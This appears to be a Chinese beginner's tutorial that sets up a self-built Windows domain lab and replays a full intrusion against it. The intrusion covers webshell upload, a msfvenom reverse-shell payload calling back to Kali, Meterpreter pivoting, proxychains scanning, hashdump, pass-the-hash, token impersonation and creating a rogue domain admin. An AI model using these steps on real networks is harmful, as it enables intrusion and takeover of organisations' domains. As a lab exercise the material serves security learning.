准备:
DC:由一台Server2008搭建 VMnet8
数据库服务器MySQL:由一台Server2008搭建 VMnet8
WEB服务器:由一台Server2008搭建( WEB服务器双网卡,VMnet0连接外网, VMnet8连接内网)
办公电脑:win7搭建 VMnet8
环境搭建:
条件:搭建好之后是能ping通的
1、DC和win7利用之前搭建好的
2、搭建web服务器环境---》配置双网卡,VMnet8加入域-----》安装Apache-----》在DC中创建web服务器的用户
3、搭建Mysql数据库环境----》加入域----》安装Mysql-----》在DC中创建mysql的用户
WEB服务器环境
WEB服务器建立双网卡
登录Administrator的账户,ipconfig查看两张网卡,需要去配置内网网段
配置DNS服务器的ip为DC的ip
加入域控
使用域管的账号登录,安装phpstudy 核心点:外网能够访问到web服务
启动Apache:出现80端口被占用,需要执行以下命令
netstat -ano #查看所有占用80端口的进程
net stop http #关闭服务
netstat -ano | findstr 80 查找80端口的进程
验证web是否可用
网站根目录---》创建一个PHP格式的文件
web服务已经安装好了!!!
创建web服务的用户,并进行登录
数据库服务器环境
配置DNS服务器的ip为DC的ip
登录Administrator账号加入域控
登录域管的账户,安装phpstudy 核心点:提供数据库服务
验证数据库是否可用
先关闭防火墙
数据库服务安装好了!!
创建Mysql服务,并进行登录
web渗透
因为是自己搭建的web服务,所以就生成一个木马文件,上传到web服务器,使用蚁剑进行连接
打开根目录生成木马文件
上传木马文件
拿shell
这里需要在kali上安装蚁剑,使用蚁剑进行连接
内网渗透
使用kali生成一个木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=9527 -f
exe > shell.exe
注意路径,上传文件需要知道生成木马文件的路径。使用命令pwd
开启msf,使用监听模块
上传木马文件
执行木马文件
拿到meterpreter
做到这里就是将web渗透和内网渗透结合起来了!!!
信息收集
基本信息收集-执行操作系统命令
查看角色:getuid
提权:getsystem
查看主机信息:sysinfo
查看网卡信息:ipconfig
输入ipconfig /all
再次验证
输入systeminfo
基于此,可以确定网段和域名了
建立路由:这里一定要明白为什么建立路由
基于metrepreter,进入内网
run get_local_subnets 找网段
run post/multi/manage/autoroute 自动建立路由
run autoroute -p 打印路由
内网信息收集
可以使用模块或者namp进行主机和端口信息的收集(使用nmap需要开通代理)
收集主机
使用arp协议:post/windows/gather/arp_scanner
收集端口
使用模块:
use auxiliary/scanner/portscan/tcp
使用portscan这个模快扫描端口会很慢
开通代理使用namp进行扫描
要知道为什么要开通代理?
使用kali自带的模块
search socks_proxy
然后配置proxychains:
vim /etc/proxychains4.conf
新开一个终端,利用proxychains来启动nmap扫描:
这里主要针对重要的端口去进行查看(这里指定了端口进行扫描)
proxychains4 nmap 192.168.222.103 -sT -Pn -p80,445,135,3306
使用永恒之蓝发现无法获得shell
提权
如果这里不是system,需要getsystem进行提权
横向移动
hashdump
获得用户和密钥
如果hashdump报错的话,ps查看进程,进程转移migrate,当然其他问题也会导致报错,具体问题具体分析
可以尝试PTH (哈希传递),直接用代理启动msfconsole
proxychains4 msfconsole
哈希传递
use exploit/windows/smb/psexec
拿到权限后,添加用户,尝试远程登录
添加用户
连接远程桌面,登录test用户
# 将目标机192.168.66.103的3389端口转发到本地2222端口
portfwd add -l 2222 -r 192.168.222.103 -p 3389
#查看转发列表
portfwd list
#清空转发列表
portfwd flush
#远程桌面
rdesktop 127.0.0.1:2222
拿域控
域相关的命令
# 显示一个计算机上共享资源的列表
net view
net view /domain
# 获取所有域的用户列表
net user /domain
# 获取域用户组信息
net group /domain
# 获取当前域管理员信息
net group "domain admins" /domain
# 查看域时间及域服务器的名字
net time /domain
# 添加普通域用户,这个要域管理权限才可以的
net user jack 123123 /add /domain
# 将普通域用户提升为域管理员
net group "Domain Admins" jack /add /domain
拿域控
伪装域管------》前提条件是域管是登录过的
令牌窃取
这个地方存在一个TOKEN,对于我们来说非常好理解,也就是和web里面的cookie类似。
用户每次登录,账号绑定临时的Token,访问资源时提交Token进行身份验证,类似于WEB Cookie
要想获取这个Token,这个地方我们需要用到一个额外的软件:Incognito
独立功能的软件,被MSF集成在meterpreter中
无需密码破解或获取密码HASH,窃取Token将自己伪装成其他用户
尤其适用于域环境下提权渗透多操作系统
load incognito
列出用户的token :list_tokens -u
模拟令牌:impersonate_token 域管的token,注意双斜杠
如:impersonate_token MYSQL-SERVER\Administrator
添加账户
1、先提到getsystem权限
2、添加用户:add_user 用户名 密码 -h DC的ip (因为添加账户到域下面,所以必须是DC的ip)
3、添加用户到管理员组:add_group_user "domain admins" 用户名 -h DC的ip
4、进入cmd shell 查看
5、net group "domain admins" /domain 查看是否添加成功并且在域管下
加下方wx,拉你一起进群学习
原文始发于微信公众号(红队蓝军):自主搭建网络域渗透靶场及靶场复现(小白适用)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论